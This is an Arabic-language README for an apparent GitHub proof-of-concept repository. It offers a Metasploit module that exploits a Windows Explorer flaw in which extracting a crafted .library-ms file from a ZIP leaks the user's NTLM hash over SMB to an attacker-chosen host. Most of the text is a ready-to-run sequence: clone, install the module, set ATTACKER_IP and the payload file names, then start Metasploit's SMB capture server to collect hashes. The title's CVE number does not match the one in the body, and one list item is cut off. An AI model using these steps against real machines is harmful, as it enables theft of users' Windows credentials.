
POC لـ CVE-2025-24054
يحتوي هذا المستودع على وحدة Metasploit لاستغلال ثغرة CVE-2025-24071، وهي ثغرة في مستكشف Windows تؤدي إلى تسرب تجزئات NTLM عند استخراج ملف .library-ms ضار من أرشيف ZIP.
تم التطوير بواسطة: FOLKS-IWD
تحدث الثغرة عندما يقوم المستخدم باستخراج أرشيف ZIP يحتوي على ملف .library-ms مُعد خصيصًا. يقوم مستكشف Windows تلقائيًا ببدء طلب مصادقة SMB إلى خادم بعيد محدد في الملف، مما يؤدي إلى تسرب تجزئة NTLM الخاصة بالمستخدم دون أي تفاعل من المستخدم.
تقوم وحدة Metasploit هذه بما يلي:
.library-ms ضار.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # استبدل بعنوان IP الخاص بك
set FILENAME exploit.zip # اسم ملف ZIP الضار
set LIBRARY_NAME malicious.library-ms # اسم ملف .library-ms
set SHARE_NAME shared # اسم مشاركة SMB
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # نفس ATTACKER_IP
run